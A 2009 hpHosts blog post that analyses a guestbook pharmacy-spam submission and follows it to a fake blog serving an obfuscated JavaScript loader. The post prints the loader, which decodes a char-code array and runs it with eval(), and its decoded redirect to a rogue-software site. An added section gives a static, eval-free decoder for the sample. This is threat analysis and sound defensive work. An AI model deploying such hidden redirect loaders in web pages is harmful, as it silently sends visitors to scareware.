Blog for hpHosts, and whatever else I feel like writing about ....

Monday, 22 June 2009

On the subject of blog spam ......

.... though technically not blog spam, one of the sites I look after had the following submitted to its guestbook a few minutes ago (good thing I wrote a filter for it, huh?):

*********************************************************************
General
*********************************************************************
Reason for message: BLACKLISTED USER guestbook submission notification
Server address: [REMOVED]
Referring page: [REMOVED]
Date submitted: 23 June 2009
Time submitted: 02:08:04
Submitted by: Helen < helta3443@gmail.com >
Posters IP: 66.114.134.154
*********************************************************************
Details
*********************************************************************
Name: Helen
E-mail: helta3443@gmail.com
Private?: False
Comments:

that bring bloodthe blood are open.
<a href=www.youtube.comorderviagraonline1>order viagra here<a>state the penis isarteries going toblood can enter the[url=www.youtube.comorderviagraonline1]order viagra online[url]then gets trapped inelongates and


In case you're wondering, our dear spammer is apparently coming from pioneernet.net (a US-based ISP, by the look of it; never heard of them myself).

You're probably wondering:

1. Why I am writing about this
2. Why I didn't have it block anything with A HREF or BBCode

Well, to answer #1, I thought it was funny, especially given that this particular spam doesn't lead to a YouTube video, which is what I was actually expecting, but to a profile that links to pharmacy-elite.com (IP: 195.95.155.21), registered to Nexton Limited in Ukraine and hosted by MoskvaCom Ltd in Russia (AS2118), who also host canadianhealthcare.eu (IP: 195.95.155.3).

Our dear spammer, however, is also known for something a little worse than meds spam: rogue crapware. Looking at ProjectHoneyPot shows references to a fake WordPress blog at softwarestory.com (I say fake because I've got a few other sites listed that are hosted on the same IP block). Looking at its source code shows a reference to a .JS file:

vURL Online - softwarestory.com/wp-admin/games/oufff.js
http://vurl.mysteryfcm.co.uk/?url=689094

This returns some rather interesting code:

var str=["336", "333", "332", "332", "332", "441", "420", "437", "355", "435", "434", "441", "384", "371", "382", "336", "333", "332", "332", "332", "425","440", "433", "422", "439", "428", "434", "433", "355", "434", "420", "420", "442", "426", "424", "434", "440", "437", "444", "444", "441", "440", "363","436", "440", "424", "437", "444", "364", "446", "336", "333", "332", "332", "332", "332", "442", "428", "433", "423", "434", "442", "369", "431", "434", "422", "420", "439", "428", "434", "433", "384", "362", "427", "439", "439", "435", "381", "370", "370", "434", "433", "431", "428", "433", "424", "425", "440", "437", "433", "428", "439", "440", "437", "424", "375", "440", "369", "428", "433", "425", "434", "370", "438", "440", "439", "437", "420", "370", "428", "433", "369", "422", "426", "428", "386", "373", "371", "361", "435", "420", "437", "420", "432", "424", "439", "424", "437", "384", "362", "355", "366", "355", "436", "440", "424", "437", "444", "355", "366", "355", "362", "361", "440", "437", "384", "372", "361", "395", "407", "407", "403", "418", "405", "392", "393", "392", "405", "392", "405", "384", "438", "434", "425", "439", "442", "420", "437", "424", "438", "439", "434", "437", "444", "418", "426","420", "432", "424", "438", "362", "382", "336", "333", "332", "332", "332", "448"];

var temp='';
var gg='';
// Every element of str is a character code shifted up by a fixed 323.
// Subtracting the offset and rebuilding the string gives the real script,
// which is then handed straight to eval(). That one-byte shift is the
// whole of the "obfuscation".
for (var i=0; i<str.length; i++){
    gg=str[i]-323;
    temp=temp+String.fromCharCode(gg);
}
eval(temp);


If we decode this, we see:

var pov=0;
function oaawgeouryyvu(query){
    window.location='http://onlinefurniture4u.info/sutra/in.cgi?20&parameter=' + query + '&ur=1&HTTP_REFERER=softwarestory_games';
}


If we take that URL and drop the ' + query + ' part (i.e. request it with the parameter left empty), it redirects us to:

stabilityinternettools.com/index.php?affid=01000
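The decoding steps above, as an added example that is not part of the original post and not code from the captured script: a small Node.js script that reproduces the subtract-and-fromCharCode loop without ever calling eval(), works out the offset for itself instead of trusting the loader, and pulls the redirect URL and the hostnames out of the result. The numeric array is the one captured from oufff.js as printed above; the function names, the offset-guessing heuristic and the regular expressions are my own assumptions.

```javascript
// Added example, not code from the original post or from the obfuscated
// script it quotes: a static decoder for the oufff.js technique described
// above. CAPTURED is the numeric array as printed on the page; everything
// else (function names, the offset heuristic) is my own illustration.

const CAPTURED = [
  336, 333, 332, 332, 332, 441, 420, 437, 355, 435, 434, 441, 384, 371, 382,
  336, 333, 332, 332, 332, 425, 440, 433, 422, 439, 428, 434, 433, 355, 434,
  420, 420, 442, 426, 424, 434, 440, 437, 444, 444, 441, 440, 363, 436, 440,
  424, 437, 444, 364, 446,
  336, 333, 332, 332, 332, 332, 442, 428, 433, 423, 434, 442, 369, 431, 434,
  422, 420, 439, 428, 434, 433, 384, 362, 427, 439, 439, 435, 381, 370, 370,
  434, 433, 431, 428, 433, 424, 425, 440, 437, 433, 428, 439, 440, 437, 424,
  375, 440, 369, 428, 433, 425, 434, 370, 438, 440, 439, 437, 420, 370, 428,
  433, 369, 422, 426, 428, 386, 373, 371, 361, 435, 420, 437, 420, 432, 424,
  439, 424, 437, 384, 362, 355, 366, 355, 436, 440, 424, 437, 444, 355, 366,
  355, 362, 361, 440, 437, 384, 372, 361, 395, 407, 407, 403, 418, 405, 392,
  393, 392, 405, 392, 405, 384, 438, 434, 425, 439, 442, 420, 437, 424, 438,
  439, 434, 437, 444, 418, 426, 420, 432, 424, 438, 362, 382,
  336, 333, 332, 332, 332, 448,
];

// The obfuscator's own loop, minus eval(): each element is a char code
// shifted up by a constant. Accepts numbers or the numeric strings the
// loader actually uses.
function decodeOffsetArray(codes, offset) {
  return codes.map((c) => String.fromCharCode(Number(c) - offset)).join('');
}

// Recover the offset without reading the loader: try every shift that keeps
// all elements inside 7-bit ASCII and accept the first one that produces
// only printable text (plus CR/LF/TAB) containing a JavaScript keyword.
function guessOffset(codes) {
  const nums = codes.map(Number);
  const lo = Math.max(...nums) - 126; // largest element must map to <= '~'
  const hi = Math.min(...nums) - 9;   // smallest element must map to >= TAB
  for (let off = lo; off <= hi; off++) {
    const text = decodeOffsetArray(nums, off);
    if (/^[\x20-\x7e\t\r\n]*$/.test(text) &&
        /\b(var|function|window)\b/.test(text)) {
      return off;
    }
  }
  return null;
}

// Rebuild the redirect target from the decoded source. The URL is a string
// concatenation with a runtime variable spliced in; joining only the quoted
// literals is the "drop ' + query + '" step from the post.
function extractRedirect(src) {
  const m = /window\.location\s*=\s*([^;]+);/.exec(src);
  if (!m) return null;
  return Array.from(m[1].matchAll(/'([^']*)'/g), (x) => x[1]).join('');
}

// Hostnames referenced by the decoded payload: the part you would feed to a
// blocklist such as hpHosts.
function extractHosts(src) {
  return Array.from(src.matchAll(/https?:\/\/([a-z0-9.-]+)/gi),
                    (x) => x[1].toLowerCase());
}

function analyse(codes) {
  const offset = guessOffset(codes);
  if (offset === null) {
    return { offset: null, source: null, redirect: null, hosts: [] };
  }
  const source = decodeOffsetArray(codes, offset);
  return {
    offset,
    source,
    redirect: extractRedirect(source),
    hosts: extractHosts(source),
  };
}

const report = analyse(CAPTURED);
console.log(`offset: ${report.offset}`);
console.log(report.source);
console.log(`redirect: ${report.redirect}`);
console.log(`hosts: ${report.hosts.join(', ')}`);
```

Run it with node. guessOffset() lands on 323, the same constant the loader subtracts, and extractRedirect() gives the in.cgi URL with the parameter value left empty, which is the form followed above to stabilityinternettools.com. Decoding offline like this, rather than letting a browser run the script, is the safer habit: the real script only needs one call to move the visitor on, and a single-offset shift like this one is trivial to reverse without executing anything.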

To answer #2, I don't get anywhere near as many infected or spammy e-mails as I used to, so I've got to try and keep some of my fun.

References:

Spambot Search Tool - 66.114.134.154 / helta3443@gmail.com
http://forum.hosts-file.net/sbst/index.php?name=&email=helta3443@gmail.com&ip=66.114.134.154

hpHosts - onlinefurniture4u.info
http://hosts-file.net/?s=onlinefurniture4u.info

hpHosts - stabilityinternettools.com
http://hosts-file.net/?s=stabilityinternettools.com
